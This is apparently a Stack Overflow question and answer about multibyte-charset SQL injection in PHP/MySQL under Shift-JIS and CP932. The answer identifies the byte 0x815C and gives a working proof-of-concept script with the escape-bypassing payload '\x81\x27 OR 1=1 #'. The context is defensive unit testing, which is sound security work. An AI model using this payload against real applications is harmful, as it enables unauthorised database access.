Search code examples
phpmysqlsecurityencodingsql-injection

How to create a SQL injection attack with Shift-JIS and CP932?


I'm writing some unit tests to ensure my code isn't vulnerable to SQL injection under various charsets.

According to this answer, you can create a vulnerability by injecting \xbf\x27 using one of the following charsets: big5, cp932, gb2312, gbk and sjis

This is because if your escaper is not configured correctly, it will see the 0x27 and try to escape it such that it becomes \xbf\x5c\x27. However, \xbf\x5c is actually one character in these charsets, thus the quote (0x27) is left unescaped.

As I've discovered through testing, however, this is not entirely true. It works for big5, gb2312 and gbk but neither 0xbf27 or 0xbf5c are valid characters in sjis and cp932.

Both

mb_strpos("abc\xbf\x27def","'",0,'sjis')

and

mb_strpos("abc\xbf\x27def","'",0,'cp932')

Return 4. i.e., PHP does not see \xbf\x27 as a single character. This returns false for big5, gb2312 and gbk.

Also, this:

mb_strlen("\xbf\x5c",'sjis')

Returns 2 (it returns 1 for gbk).

So, the question is: is there another character sequence that make sjis and cp932 vulnerable to SQL injection, or are they actually not vulnerable at all? or is PHP lying, I'm completely mistaken, and MySQL will interpret this totally differently?


Solution

  • The devil is in the details ... let's start with how answer in question describes the list of vulnerable character sets:

    For this attack to work, we need the encoding that the server's expecting on the connection both to encode ' as in ASCII i.e. 0x27 and to have some character whose final byte is an ASCII \ i.e. 0x5c. As it turns out, there are 5 such encodings supported in MySQL 5.6 by default: big5, cp932, gb2312, gbk and sjis. We'll select gbk here.

    This gives us some context - 0xbf5c is used as an example for gbk, not as the universal character to use for all of the 5 character sets.
    It just so happens that the same byte sequence is also a valid character under big5 and gb2312.

    At this point, your question becomes as easy as this:

    Which byte sequence is a valid character under cp932 and sjis and ends in 0x5c?

    To be fair, most of the google searches I tried for these character sets don't give any useful results. But I did find this CP932.TXT file, in which if you search for '5c ' (with the space there), you'll jump to this line:

    0x815C 0x2015 #HORIZONTAL BAR

    And we have a winner! :)

    Some Oracle document confirms that 0x815c is the same character for both cp932 and sjis and PHP recognizes it too:

    php > var_dump(mb_strlen("\x81\x5c", "cp932"), mb_strlen("\x81\x5c", "sjis"));
    int(1)
    int(1)
    

    Here's a PoC script for the attack:

    <?php
    $username = 'username';
    $password = 'password';
    
    $mysqli = new mysqli('localhost', $username, $password);
    foreach (array('cp932', 'sjis') as $charset)
    {
            $mysqli->query("SET NAMES {$charset}");
            $mysqli->query("CREATE DATABASE {$charset}_db CHARACTER SET {$charset}");
            $mysqli->query("USE {$charset}_db");
            $mysqli->query("CREATE TABLE foo (bar VARCHAR(16) NOT NULL)");
            $mysqli->query("INSERT INTO foo (bar) VALUES ('baz'), ('qux')");
    
            $input = "\x81\x27 OR 1=1 #";
            $input = $mysqli->real_escape_string($input);
            $query = "SELECT * FROM foo WHERE bar = '{$input}' LIMIT 1";
            $result = $mysqli->query($query);
            if ($result->num_rows > 1)
            {
                    echo "{$charset} exploit successful!\n";
            }
    
            $mysqli->query("DROP DATABASE {$charset}_db");
    }